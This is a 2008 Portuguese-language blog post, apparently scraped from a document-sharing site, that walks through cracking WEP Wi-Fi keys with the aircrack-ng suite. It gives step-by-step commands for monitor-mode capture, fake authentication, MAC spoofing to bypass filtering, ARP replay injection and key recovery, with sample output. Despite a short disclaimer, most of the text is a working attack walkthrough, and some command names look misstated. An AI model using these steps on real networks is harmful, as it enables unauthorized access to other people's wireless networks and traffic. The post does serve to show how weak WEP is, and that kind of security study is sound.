Você está na página 1de 5

Wireless Como quebrar senhas de redes WEP e WPA

Posted May 2, 2008

Hoje acordei com vontade de pesquisar sobre segurana em redes wireless e me surpreendi com os resultados! POST ATUALIZADO: Alguns usurios relataram que alguns roteadores novos no esto possibilitando quebrar a senha WEP nem WPA. importante lembrar que o sinal da sua placa wireless tem que estar forte. Aqui no blog, coloquei um post de como fazer uma antena wireless usando lata de batata pringles ou lata de leo, tambm chamada de Cantenna. No site da aircrack tambm h alguns updates do software e de drivers. H pelo menos uns quatro ou cinco softwares bons para quebrar segurana em redes que utilizam WEP ou WPA e o ataque, apesar de usar fora bruta e um pouco de matemtica, realmente funciona. O intuito aqui no estimular o ataque s redes disponveis e sim mostrar um pouco da fragilidade de segurana. Vamos aos fatos, ou melhor, aos artefatos Objetivos: ========= Pesquisar o modo que os pacotes so transmitidos pela rede sem fio; Localizar uma forma de captar os pacotes atravs de um sniffer; Quebrar a senha WEP / WPA; Minha pesquisa baseou-se inicialmente no modo em que os pacotes so enviados pela rede sem fio e de uma possvel forma de captar os pacotes. A partir desse princpio, localizar uma forma de quebrar a criptografia do WEP e do WPA. A brincadeira consiste em deixar seu adaptador de rede sem fio no modo de monitoramento, para que seja capaz de ler os pacotes que esto voando e injetar de volta no AccessPoint gerando trfego suficiente para a quebra da chave. O princpio o mesmo usado no modo de capturamento de pacotes das redes que utilizam hub ou os antigos cabos coaxiais: Quem estiver conectado pode checar se aquela informao realmente lhe pertence. Se temos um adaptador wireless que esteja ao alcance do AccessPoint(AP), podemos verificar os pacotes. Nota 1: Voc pode ler meu outro post que fala sobre a criao de uma Cantena ou Cantenna, usando uma lata de batata pringles, amplificando seu sinal. Para quem no acredita, realmente funciona.

Nota 2: Para poder executar os passos aqui citados, sua placa de rede PRECISA TER SUPORTE AO MODO DE MONITORAMENTO E INJEO DE PACOTES! http://www.aircrack-ng.org/doku.php?id=compatibility_drivers Nota 3: Se voc tiver que comprar uma placa de rede Wireless, aproveite para achar uma que tenha conector para acoplar antena externa. Utilitrios: ============ Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuio linux) dentro de uma Virtual Machine [abaixo explico os motivos] Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ] Adaptador Wireless USB GWL-G122 Reviso C [ Ver compatibilidade no site do Aircrack ] Por que usar linux ? Simples: O nmero de placas que possuem suporte ao modo de monitoramento e ao modo de injeo de pacotes muito maior que no Windows. A maioria dos fabricantes desenvolve drivers que possuem este modo desabilitado para justamente evitar este tipo de ataque. Por que usar uma Virtual Machine ? Gosto de simplicidade: Meu notebook est com Windows e o trabalho para reparticionar o HD e instalar o linux no modo DualBoot no compensa. mais simples aproveitar os benefcios da emulao de outro sistema operacional. No est no escopo desse post os detalhes da instalao do Linux, mas se voc tiver o VMWare (software responsvel por emular SOs), no prprio site do Aircrack j tem uma prontinha pra usar http://www.aircrack-ng.org/doku.php#virtual_machine1 Quebrando as senhas: =================== WEP Mais fcil de quebrar, pois o ataque apesar de usar fora bruta, utiliza estatstica e pedaos da chave enviado nos pacotes para acelerar a quebra. Quanto mais IVs capturados pelo Aircrack, maior a chance de quebra. IV um pacote capturado que pode ser usado para recuperar um pedao de chave. Uma dica importante no ficar esperando a rede enviar IVs para voc e sim voc tentar aumentar o nmero de capturas com ataques ARP, chopchop e fragmentao. Todos os comandos devero ser rodados em um terminal, logado como root:

1 Rode o comando abaixo para validar os AccessPoints ativos: aircrack-ng interface_rede Localize AccessPoint desejado e pare o comando com ctrl+c. Vamos filtrar a execuo para garantir maior nmero de pacotes coletados, j que o scan feito por canais de 1 a 12. 2 Filtre a rede desejada por canal / bssid e deixe ele parado rodando. aircrack-ng -c canal bssid 00:00:00:00 -w arquivo_saida interface_rede Onde: canal = Canal mostrado pelo comando 1 00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado no comando 1 arquivo_saida = Nome do arquivo que o aplicativo ir salvar e que ser usado para capturar a senha interface_rede = Interface wireless usada (wifi0, rausb0, etc) Note que h colunas mostrando Beacons e IVs. Podemos considerar Beacons como lixo para o nosso ataque e IVs para os pacotes que realmente interessam. Consegui quebrar WEP com 5.000 IVs mas um nmero bom, gira em torno dos 80.000. 3 Abra um novo terminal para tentarmos uma autenticao FAKE aireplay-ng -1 0 -e nome -a bssid -h mac_sua_placa_rede interface_rede Onde: nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra voc no comando 1 bssid = BSSID da rede (mac address do AP) mac_sua_placa_rede = Mac Address da sua placa de rede interface de rede = interface da rede wifi Comando exemplo: aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 rausb0 Se o comando funcionar, voc ver um resultado assim: 18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet Mantenha esse terminal aberto para manter a associao falsa. Nota: Alguns AccessPoints possuem filtro por MAC Address. Caso a associao no funcione, utilize o tcpdump para achar um MAC que esteja liberado e troque o MAC da sua placa com o MacChanger.

Um exemplo de execuo de tcpdump seria: tcpdump -n -e -s0 -vvv -i interface_rede 4 Execuo dos ataques 4.1 Abra um novo terminal e execute o aireplay para tentar gerar replicao de pacote ARP aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede Onde: -3 = o tipo de ataque ARP bssid = Mac do AccessPoint mac_sua_placa = Mac Address da sua placa de rede interface_rede = Interface da rede wifi Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns pacotes ARP na rede para gerar o trfego. Um usurio conectado com cabo no AP suficiente para o ataque funcionar. Exemplo de um comando que est executando com sucesso: Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets Se funcionar, voc ver o nmero de IVs crescer absurdamente. Pare os comandos quando estiver com +- 80.000 IVs e pule para o passo 5. 5 Descubra a chave aircrack-ng -b bssid arquivo*.cap Onde: bssid = Mac do AccessPoint que est ativo capturando pacotes arquivo*.cap = Prefixo do arquivo colocado no comando 1 Se tudo der certo, aparecer no meio da tela: KEY FOUND! [ 12:34:56:78:90 ] Decrypted correctly: 100% Voc nunca achar a chave original e sempre a chave em hexa. Remova os dois pontos : e tente conectar na rede. Bingo!! 6 Se algo saiu errado.. Essa a maneira mais fcil de conseguir a quebra. H uma infinidade de jeitos de tentar gerar trfego e IVs. Aqui vo alguns links que ajudaro a entender mais sobre os ataques: [Forma simples de crackear] http://www.aircrackng.org/doku.php?id=simple_wep_crack&s=simple%20wep%20crack

[Formas de aumentar os IVs] http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase [Post no Warchalking] http://capivara.warchalking.com.br/forum/viewtopic.php?p=8826&sid=598caa58d4ae9c 0fdfe079be733bca4a

Você também pode gostar